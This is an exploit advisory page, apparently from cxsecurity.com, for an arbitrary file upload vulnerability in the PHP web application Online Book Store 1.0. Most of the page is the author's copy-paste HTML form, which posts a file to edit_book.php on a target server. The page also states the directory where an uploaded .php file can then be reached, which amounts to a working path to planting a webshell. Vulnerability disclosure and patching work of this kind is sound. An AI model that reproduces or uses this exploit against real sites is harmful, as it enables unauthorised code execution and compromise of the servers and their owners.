Online Book Store 1.0 Arbitrary File Upload

2020.01.17
Credit: Or4nG.M4N
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

# Exploit Title: Online Book Store 1.0 - Arbitrary File Upload # Google Dork: N/A # Date: 2020-01-16 # Exploit Author: Or4nG.M4n aka S4udiExploit # Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/ # Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip # Version: 1.0 # Tested on: MY MIND v1.23.45 # CVE: N/A # WWW . SEC4EVER . COM -> hola amigos ^.^ -> just copy this html code <form method="post" action="http://TARGET/edit_book.php" enctype="multipart/form-data"> <td><input type="text" name="isbn" value="978-1-49192-706-9" readOnly="true"></td> <td><input type="text" name="author" value="Or4nG.M4n aka S4udiExploit" required></td> <td><input type="file" name="image"></td> <input type="submit" name="save_change" value="Change" class="btn btn-primary"> </form> -> after you upload your'e file u will find it here /store/bootstrap/img/[FILE].php # i think am back %^_^% # i-Hmx , N4ssim , Sec4ever , The injector , alzher , All the Member of Sec4ever.com # big thanks to Stupid Coder ^.^


Vote for this issue:
33%
67%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top